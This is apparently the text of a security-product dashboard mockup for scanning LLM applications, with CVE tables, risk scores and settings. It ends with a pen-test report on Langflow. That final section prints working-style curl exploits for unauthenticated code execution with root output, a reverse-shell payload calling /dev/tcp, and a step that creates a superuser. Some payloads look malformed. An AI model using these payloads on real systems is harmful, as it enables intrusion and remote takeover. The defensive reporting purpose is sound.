Dashboard
Overview · 6 Apr 2026
0% False Positive Rate
Total Scans
48
LLM apps analysed
↑ 12 this month
CVEs Found
347
Across all components
183 proprietary
Critical Issues
24
Requiring action now
↑ 3 since last scan
Components
2,681
Dependencies mapped
100% parse rate

Recent Scans

Last 7 days
🤖
LangChain-RAG-Pipeline v2.1.4
SCA + Pen Test · 2h ago · 312 components
Critical
🔗
LlamaIndex-Enterprise v0.9.2
SCA · Yesterday · 187 components
High
OpenAI Agents SDK v1.2.0
SCA + Pen Test · 2 days ago · 94 components
High
🛠️
api4.ai2wj.com (OWASP Juice Shop)
Full Pen Test · 3 days ago · 1 Apr
Medium
🌐
AutoGPT v0.5.1
SCA · 5 days ago · 241 components
Low

Ecosystem Risk

72
Overall Risk Score
24
Critical
67
High
112
Medium
144
Low

Activity

Critical CVE in langchain-core 0.1.5 — CVE-2024-3095 (CVSS 9.1)
2 hours ago
Pen test on api4.ai2wj.com — 14 exploits confirmed
1 day ago
New proprietary CVE added — LlamaIndex injection vector
2 days ago
AutoGPT v0.5.1 — 241 components parsed, 0 false positives
5 days ago
New Scan
LLM Supply Chain Security Analysis

Scan an LLM Application

Paste a repository URL or upload a project folder. Sentinel will map all components, detect CVEs, and run automated pen testing.

Steps: 1. Target · 2. Scan Type · 3. Run & Report

🔬
SCA Scan
Map all LLM components, detect CVEs, 0% false positive
⚔️
Pen Test
Automated agentic pen testing, 660 exploitation tasks
📊
Risk Score
Component-level scoring beyond CVSS for insurance & compliance
Scan History
All past scans

48 total
🤖
LangChain-RAG-Pipeline v2.1.4
SCA + Pen Test · 312 components · 6 Apr 2026 14:32
86
Critical
🔗
LlamaIndex-Enterprise v0.9.2
SCA · 187 components · 5 Apr 2026 09:14
71
High
OpenAI Agents SDK v1.2.0
SCA + Pen Test · 94 components · 4 Apr 2026 16:50
68
High
🛠️
api4.ai2wj.com (OWASP Juice Shop)
Full Pen Test · 1 Apr 2026 · Template report
54
Medium
🌐
AutoGPT v0.5.1
SCA · 241 components · 1 Apr 2026 11:05
22
Low
Scan Results
LangChain-RAG-Pipeline v2.1.4 · 6 Apr 2026 14:32
86
LangChain-RAG-Pipeline v2.1.4
github.com/example-org/langchain-rag-pipeline · SCA + Pen Test · 312 components · 11m 24s
LangChain 0.1.5 · LlamaIndex 0.9.2 · OpenAI SDK · Python 3.11 · 5 Critical CVEs
🔍
47
CVEs (5 proprietary)
🧩
312
Components (100% parse)
⚔️
14
Exploits confirmed

CVE Findings

Sorted by severity
CVE ID | Component | Severity | CVSS | Status
CVE-2024-3095 | langchain-core 0.1.5 | Critical | 9.1 | Unpatched
⬛ PROP-0047 | llama-index 0.9.2 | Critical | 8.8 | No public PoC
CVE-2024-1876 | transformers 4.36.0 | High | 7.5 | Patch available
CVE-2023-9182 | openai 1.6.1 | High | 7.2 | Patch available
⬛ PROP-0031 | faiss-cpu 1.7.4 | Medium | 5.1 | No public PoC
⬛ Proprietary CVE — detected only by Sentinel, not in NVD/OSV · Showing 5 of 47

Component Risk

Top contributors
langchain-core
0.1.5
95
llama-index
0.9.2
82
transformers
4.36.0
75
openai
1.6.1
60

Pen Test Summary

14
Exploits confirmed
29
Attack objectives
✅ Non-lateral — zero collateral impact
✅ Response-adaptive exploit strategy
⚠️ Prompt injection chain: 3 paths found
SCA Results SCA Only
LangChain-RAG-Pipeline v2.1.4 · github.com/example-org/langchain-rag-pipeline · 6 Apr 2026 14:32 · 4m 18s
0% False Positive Rate
74
LangChain-RAG-Pipeline v2.1.4
SCA Risk Score · 47 vulnerabilities across 312 components · Python 3.11 ecosystem
langchain-core 0.1.5 · llama-index 0.9.2 · transformers 4.36.0 · openai 1.6.1 · 100% parse rate · ⬛ 5 proprietary CVEs
Input files
requirements.txt
pyproject.toml
48 direct · 264 transitive
47
Total CVEs
5
Critical
12
High
18
Medium
Component Map
Dependency tree & supply chain visualisation

Dependency Tree

312 components
langchain-core 0.1.5
2 Critical CVEs · risk 95
langchain-community 0.0.24
1 High CVE
pydantic 2.4.2
1 Medium CVE
anyio 3.7.1
No CVEs found
llama-index 0.9.2
1 Critical (Prop) · risk 82
openai 1.6.1
1 High CVE
tiktoken 0.5.2
No CVEs found
transformers 4.36.0
1 High CVE · risk 75
tokenizers 0.15.0
No CVEs found
safetensors 0.4.1
No CVEs found
[Dependency graph placeholder: interactive D3 graph — connect to component API for full tree. Legend: Critical, High, Medium, Low / Clean]
CVE Database
183 proprietary + NVD/OSV feed
183 Proprietary CVEs
🏗️ Placeholder — connect to CVE library API (llmscapi.wj2ai.com) for live database
Total CVEs
2,847
NVD + OSV + Proprietary
Proprietary
183
Lab-only, no public PoC
LLM-Specific
341
LangChain, LlamaIndex, etc.
Added This Month
12
New entries Apr 2026

CVE Library

2,847 entries
CVE ID | Component | Type | Severity | CVSS | Source | Added
⬛ PROP-0047 | llama-index 0.9.x | Prompt Injection | Critical | 8.8 | Proprietary | 2 Apr 2026
CVE-2024-3095 | langchain-core 0.1.x | Code Exec | Critical | 9.1 | NVD | Mar 2024
⬛ PROP-0031 | faiss-cpu 1.7.x | Memory Corruption | Medium | 5.1 | Proprietary | 28 Mar 2026
CVE-2024-1876 | transformers 4.36.x | Deserialization | High | 7.5 | NVD | Jan 2024
⬛ PROP-0019 | langchain-community | Tool Injection | High | 7.0 | Proprietary | 15 Mar 2026
CVE-2023-9182 | openai 1.6.x | Auth Bypass | High | 7.2 | NVD | Dec 2023
Showing 6 of 2,847 · ⬛ = Proprietary (lab-only) · Load more →
Risk Score
Component-level scoring methodology
🏗️ Placeholder — connect to Yongchi's risk scoring API for live component scores
Score Breakdown by Factor
CVE Severity
38
Weighted CVSS scores across all components, adjusted for exploitability and impact scope.
Dependency Depth
22
Transitive dependency chain length. Deeper chains increase attack surface and reduce patch visibility.
Exploit Availability
18
Whether working exploits exist (public PoC, Metasploit module, or Sentinel proprietary exploit).
Patch Availability
8
Proportion of CVEs with no available patch. Unpatched CVEs receive higher weighting.

Overall Score

86
/ 100 · Critical Risk
📌 38 pts from CVE severity
📌 22 pts from dep. depth
📌 18 pts from exploit avail.
📌 8 pts from no patches

Insurance Input

Frequency proxy: 312 components
Severity distribution: 5C / 12H / 18M / 12L
Avg CVSS: 6.8
Proprietary CVE exposure: 5 CVEs
For NTU actuarial model · Prof Zhu Wenjun
Component-Level Scores (top 10)
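Component | Version | CVE Count | Dep. Depth | Has Exploit | Patched | Score
langchain-core | 0.1.5 | 4 | 3 | Yes | No | 95
llama-index | 0.9.2 | 2 | 2 | Partial | No | 82
transformers | 4.36.0 | 2 | 4 | No | Yes | 75
openai | 1.6.1 | 1 | 2 | No | Yes | 60
faiss-cpu | 1.7.4 | 1 | 1 | Partial | No | 45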
Integrations
Connect Sentinel to your existing tools
🏗️ Placeholder — connect OAuth flows and webhook endpoints for each integration
Platform Connectors
GitHub
Auto-trigger SCA scans on pull requests. Post risk scores as PR checks. Supports GitHub Actions.
Connected — example-org
Jira
Create Jira tickets automatically for Critical and High CVEs. Assign to the right team based on component ownership.
Not connected
Slack
Send real-time alerts to your security channel when new Critical CVEs are detected or pen test completes.
Connected — #security-alerts
GitLab
CI/CD pipeline integration. Block deployments when risk score exceeds threshold. Supports GitLab CI.
Not connected
Splunk / SIEM
Forward scan results and CVE alerts to your SIEM via syslog or HTTP Event Collector (HEC).
Not connected
AWS / Azure
Scan container images and Lambda functions. Integrates with ECR, ACR, and cloud-native registries.
Not connected
API Keys

Production — DSO Integration
sk-sent-••••••••••••••••••••••3a9f
Staging — Internal Testing
sk-sent-••••••••••••••••••••••7c2d
Rules & Policy
Configure scan behaviour, severity thresholds, and compliance rules
🏗️ Placeholder — connect to rules engine API; toggles should write to config store
Scan Rules
Auto-scan on new dependency
Trigger SCA scan when requirements.txt or pyproject.toml changes
Block deploy on Critical CVE
Fail CI/CD pipeline if any Critical CVE is detected without a patch
Include proprietary CVE library
Use Sentinel's 183 proprietary CVEs in addition to NVD/OSV
Non-lateral pen test mode
Restrict pen test to no lateral movement — required for government clients
Auto-create Jira tickets
Create tickets for Critical and High CVEs after each scan
Scheduled weekly scan
Automatically re-scan all registered applications every Monday 02:00 SGT
Compliance Framework
Singapore CSA Cybersecurity Framework
Map findings to CSA guidelines for government reporting
MAS TRMG Alignment
Tag CVEs relevant to MAS Technology Risk Management Guidelines
PDPA Data Risk Tagging
Flag components that process personal data under Singapore PDPA
OWASP LLM Top 10
Align pen test findings to OWASP LLM Top 10 taxonomy
Severity Thresholds
⬤ Critical threshold (CVSS min)
⬤ High threshold (CVSS min)
⬤ Medium threshold (CVSS min)
⬤ Low threshold (CVSS min)
Risk score alert threshold
Max false positive tolerance (%)
Custom Severity Labels

Map Sentinel severity levels to your organisation's internal classification. Exported reports will use your labels.

Report Defaults
Include executive summary
Add a non-technical one-page summary to every PDF report
Include remediation steps
Add patch guidance and recommended actions for each CVE
Export JSON alongside PDF
Always generate machine-readable JSON report for SIEM ingestion
Pen Test
LLM-driven Automated Penetration Testing
Non-lateral · Zero Collateral Impact
Attack Pipeline
1. Info Collection
2. Weakness Gathering
3. Filtering
4. Attack Planning
5. Exploitation
Target
Langflow
v1.2.0 · Uvicorn/React
CVEs Tested
12
3 filtered for exploit
Exploited
2
CVE-2025-3248 · CVE-2025-57760
Outcome
Root Access
uid=0 confirmed
I. Executive Summary
This automated penetration test targeted Langflow Workflow Platform v1.2.0, using the Sentinel LLM agent pipeline to simulate real-world attacks. The engagement covered reconnaissance, CVE discovery, exploit generation, and privilege escalation — resulting in confirmed root access to the target system.
II. Target Overview
  • Application: Langflow Workflow Platform v1.2.0
  • Framework: React + Uvicorn (Python)
  • Server: 43.156.238.180:7860
  • Key Endpoints: /login · /api/v1/validate/code · /flow
  • Scan Mode: Non-lateral · Zero collateral impact
III. Vulnerability Summary
CVE ID | Component | Type | Severity | Status
CVE-2025-3248 | Langflow Core | Unauthenticated RCE | Critical | Exploited ✓
CVE-2025-57760 | Langflow CLI | Privilege Escalation | High | Exploited ✓
CVE-2025-68155 | React | XSS | High | Failed — patched
IV. Exploitation Walkthrough

🔍 Initial Reconnaissance

  • System detected: Langflow Workflow Platform v1.2.0
  • Live API discovered: /api/v1/validate/code
  • Auth endpoint: /login (JWT-based)

🎯 Exploit 1 — Privilege Escalation via CVE-2025-57760

A privilege escalation vulnerability in Langflow containers allows an authenticated user with RCE access to invoke the internal CLI to create a new superuser. This bypasses the UI registration flow, granting full admin access.

$ curl -X POST http://43.156.238.180:7860/api/v1/validate/code \
    -H "Content-Type: application/json" \
    -d '{ "code": "def foo(p=__import__(os).system(bash -i >& /dev/tcp/192.168.1.22/4444)):\n pass" }'
$ /app/.venv/bin/langflow superuser
Username: test | Password: test123456
Default folder created successfully.
Superuser created successfully.
HTTP/1.1 200 OK → is_superuser: true

🚀 Exploit 2 — Unauthenticated RCE via CVE-2025-3248

A remote, unauthenticated attacker can send crafted HTTP requests to the code validation endpoint to execute arbitrary system commands — without any login required.

$ curl -X POST http://43.156.238.180:7860/api/v1/validate/code \
    -H "Content-Type: application/json" \
    -d '{ "code": "@exec(raise Exception(subprocess.check_output([id])))\ndef foo():\n pass" }'
HTTP/1.1 200 OK
{ "function": { "errors": [ "uid=0(root) gid=0(root) groups=0(root)" ] } }
V. Findings & Recommendations

✅ Finding

CVE-2025-57760 enables remote attackers to create a new administrative user via internal CLI abuse. CVE-2025-3248 enables remote, unauthenticated attackers to execute arbitrary system commands including root-level account modifications.

🚨 Impact

Full system compromise achieved. Attacker obtained administrator privileges in the application and root shell access via unauthenticated remote command injection. All data on the host is at risk.

🛠️ Recommendations

  • ↑ Upgrade Langflow to a patched version immediately
  • 🔒 Restrict access to /api/v1/validate/code — require auth + IP allowlist
  • 🛡️ Introduce strict input sandboxing / code execution isolation
  • 🔑 Deploy API authentication and rate-limiting on all endpoints
  • 📊 Conduct continuous security regression testing with Sentinel